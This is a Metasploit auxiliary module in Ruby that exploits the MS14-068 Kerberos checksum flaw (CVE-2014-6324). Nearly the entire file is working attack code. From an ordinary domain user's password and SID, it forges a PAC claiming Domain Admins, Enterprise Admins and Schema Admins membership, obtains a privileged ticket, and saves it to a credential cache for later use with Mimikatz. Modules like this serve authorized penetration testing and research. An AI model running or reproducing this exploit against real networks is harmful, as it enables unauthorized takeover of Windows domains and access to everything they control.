1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Report
8
  include Msf::Exploit::Remote::Kerberos::Client
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'MS14-068 Microsoft Kerberos Checksum Validation Vulnerability',
15
        'Description' => %q{
16
          This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem
17
          exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS
18
          request, where a domain user may forge a PAC with arbitrary privileges, including
19
          Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to
20
          a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz
21
          help. It has been tested successfully on Windows 2008.
22
        },
23
        'Author' => [
24
          'Tom Maddock', # Vulnerability discovery
25
          'Sylvain Monne', # pykek framework and exploit
26
          'juan vazquez' # Metasploit module
27
        ],
28
        'References' => [
29
          ['CVE', '2014-6324'],
30
          ['MSB', 'MS14-068'],
31
          ['OSVDB', '114751'],
32
          ['URL', 'http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx'],
33
          ['URL', 'https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/'],
34
          ['URL', 'http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek'],
35
          ['URL', 'https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit']
36
        ],
37
        'License' => MSF_LICENSE,
38
        'DisclosureDate' => '2014-11-18',
39
        'Notes' => {
40
          'AKA' => ['ESKIMOROLL'],
41
          'Stability' => [CRASH_SAFE],
42
          'SideEffects' => [IOC_IN_LOGS],
43
          'Reliability' => []
44
        }
45
      )
46
    )
47

48
    register_options(
49
      [
50
        OptString.new('USERNAME', [ true, 'The Domain User' ], aliases: ['USER']),
51
        OptString.new('PASSWORD', [ true, 'The Domain User password' ]),
52
        OptString.new('DOMAIN', [ true, 'The Domain (upper case) Ex: DEMO.LOCAL' ]),
53
        OptString.new('USER_SID', [ true, 'The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000'])
54
      ]
55
    )
56
  end
57

58
  def run
59
    print_status('Validating options...')
60

61
    unless datastore['USER_SID'] =~ /^S-(\d+-){6}\d+$/
62
      print_error('Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000')
63
      return
64
    end
65

66
    domain = datastore['DOMAIN'].upcase
67

68
    print_status("Using domain #{domain}...")
69

70
    user_sid_arr = datastore['USER_SID'].split('-')
71
    domain_sid = user_sid_arr[0, user_sid_arr.length - 1].join('-')
72
    user_rid = user_sid_arr[user_sid_arr.length - 1].to_i
73

74
    checksum_type = Rex::Proto::Kerberos::Crypto::Checksum::RSA_MD5
75
    etype = Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC
76
    encryptor = Rex::Proto::Kerberos::Crypto::Encryption.from_etype(etype)
77
    password_digest = encryptor.string_to_key(datastore['PASSWORD'])
78

79
    pre_auth = []
80
    pre_auth << build_as_pa_time_stamp(key: password_digest, etype: etype)
81
    pre_auth << build_pa_pac_request
82

83
    print_status("#{peer} - Sending AS-REQ...")
84
    res = send_request_as(
85
      client_name: datastore['USERNAME'].to_s,
86
      server_name: "krbtgt/#{domain}",
87
      realm: domain.to_s,
88
      key: password_digest,
89
      pa_data: pre_auth,
90
      etype: [etype]
91
    )
92

93
    unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
94
      print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
95
      print_error("#{peer} - Invalid AS-REP, aborting...")
96
      return
97
    end
98

99
    print_status("#{peer} - Parsing AS-REP...")
100

101
    session_key = extract_session_key(res, password_digest)
102
    logon_time = extract_logon_time(res, password_digest)
103
    ticket = res.ticket
104

105
    pre_auth = []
106
    pre_auth << build_pa_pac_request
107

108
    groups = [
109
      Rex::Proto::Kerberos::Pac::DOMAIN_ADMINS,
110
      Rex::Proto::Kerberos::Pac::DOMAIN_USERS,
111
      Rex::Proto::Kerberos::Pac::SCHEMA_ADMINISTRATORS,
112
      Rex::Proto::Kerberos::Pac::ENTERPRISE_ADMINS,
113
      Rex::Proto::Kerberos::Pac::GROUP_POLICY_CREATOR_OWNERS
114
    ]
115

116
    pac = build_pac(
117
      client_name: datastore['USER'],
118
      group_ids: groups,
119
      domain_id: domain_sid,
120
      user_id: user_rid,
121
      realm: domain,
122
      logon_time: logon_time,
123
      checksum_type: checksum_type
124
    )
125

126
    auth_data = build_pac_authorization_data(pac: pac)
127
    sub_key = build_subkey(subkey_type: etype)
128

129
    print_status("#{peer} - Sending TGS-REQ...")
130

131
    res = send_request_tgs(
132
      client_name: datastore['USER'],
133
      server_name: "krbtgt/#{domain}",
134
      realm: domain,
135
      session_key: session_key,
136
      ticket: ticket,
137
      auth_data: auth_data,
138
      pa_data: pre_auth,
139
      subkey: sub_key
140
    )
141

142
    unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
143
      print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
144
      print_error("#{peer} - Invalid TGS-REP, aborting...")
145
      return
146
    end
147

148
    print_good("#{peer} - Valid TGS-Response, extracting credentials...")
149

150
    cache = extract_kerb_creds(res, sub_key.value)
151
    Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(cache, framework_module: self, host: rhost)
152
  end
153

154
  def warn_error(res)
155
    res.error_code.to_s
156
  end
157
end
158

159